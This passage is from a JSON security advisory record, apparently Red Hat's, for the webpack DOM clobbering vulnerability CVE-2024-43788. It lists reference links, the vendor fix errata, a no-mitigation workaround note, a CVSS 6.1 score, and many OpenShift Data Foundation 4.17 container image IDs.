"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
